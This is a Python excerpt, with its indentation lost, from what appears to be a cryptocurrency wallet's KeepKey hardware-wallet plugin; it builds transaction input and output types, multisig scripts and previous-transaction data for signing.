def tx_inputs(self, tx: Transaction, *, for_sig=False, keystore: 'KeepKey_KeyStore' = None):
inputs = []
for txin in tx.inputs():
txinputtype = self.types.TxInputType()
if txin.is_coinbase_input():
prev_hash = b"\x00"*32
prev_index = 0xffffffff # signed int -1
else:
if for_sig:
assert isinstance(tx, PartialTransaction)
assert isinstance(txin, PartialTxInput)
assert keystore
if len(txin.pubkeys) > 1:
xpubs_and_deriv_suffixes = get_xpubs_and_der_suffixes_from_txinout(tx, txin)
multisig = self._make_multisig(txin.num_sig, xpubs_and_deriv_suffixes)
else:
multisig = None
script_type = self.get_keepkey_input_script_type(txin.script_type)
txinputtype = self.types.TxInputType(
script_type=script_type,
multisig=multisig)
my_pubkey, full_path = keystore.find_my_pubkey_in_txinout(txin)
if full_path:
txinputtype.address_n.extend(full_path)
prev_hash = txin.prevout.txid
prev_index = txin.prevout.out_idx
if txin.value_sats() is not None:
txinputtype.amount = txin.value_sats()
txinputtype.prev_hash = prev_hash
txinputtype.prev_index = prev_index
if txin.script_sig is not None:
txinputtype.script_sig = txin.script_sig
txinputtype.sequence = txin.nsequence
inputs.append(txinputtype)
return inputs
def _make_multisig(self, m, xpubs):
if len(xpubs) == 1:
return None
pubkeys = [self._make_node_path(xpub, deriv) for xpub, deriv in xpubs]
return self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * len(pubkeys),
m=m)
def tx_outputs(self, tx: PartialTransaction, *, keystore: 'KeepKey_KeyStore'):
def create_output_by_derivation():
script_type = self.get_keepkey_output_script_type(txout.script_type)
if len(txout.pubkeys) > 1:
xpubs_and_deriv_suffixes = get_xpubs_and_der_suffixes_from_txinout(tx, txout)
multisig = self._make_multisig(txout.num_sig, xpubs_and_deriv_suffixes)
else:
multisig = None
my_pubkey, full_path = keystore.find_my_pubkey_in_txinout(txout)
assert full_path
txoutputtype = self.types.TxOutputType(
multisig=multisig,
amount=txout.value,
address_n=full_path,
script_type=script_type)
return txoutputtype
def create_output_by_address():
txoutputtype = self.types.TxOutputType()
txoutputtype.amount = txout.value
if address:
txoutputtype.script_type = self.types.PAYTOADDRESS
txoutputtype.address = address
else:
txoutputtype.script_type = self.types.PAYTOOPRETURN
txoutputtype.op_return_data = trezor_validate_op_return_output_and_get_data(txout)
return txoutputtype
outputs = []
has_change = False
any_output_on_change_branch = is_any_tx_output_on_change_branch(tx)
for txout in tx.outputs():
address = txout.address
use_create_by_derivation = False
if txout.is_mine and not txout.is_ps_ks and not has_change:
# prioritise hiding outputs on the 'change' branch from user
# because no more than one change address allowed
if txout.is_change == any_output_on_change_branch:
use_create_by_derivation = True
has_change = True
if use_create_by_derivation:
txoutputtype = create_output_by_derivation()
else:
txoutputtype = create_output_by_address()
outputs.append(txoutputtype)
return outputs
def electrum_tx_to_txtype(self, tx: Optional[Transaction]):
t = self.types.TransactionType()
if tx is None:
# probably for segwit input and we don't need this prev txn
return t
tx.deserialize()
t.version = tx.version
t.lock_time = tx.locktime
inputs = self.tx_inputs(tx)
t.inputs.extend(inputs)
for out in tx.outputs():
o = t.bin_outputs.add()
o.amount = out.value
o.script_pubkey = out.scriptpubkey
if t.version > 2:
tx_type = tx.tx_type
if tx_type:
t.extra_data = to_varbytes(serialize_extra_payload(tx))
t.version |= tx_type << 16
return t
# This function is called from the TREZOR libraries (via tx_api)
def get_tx(self, tx_hash):
tx = self.prev_tx[tx_hash]
return self.electrum_tx_to_txtype(tx)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.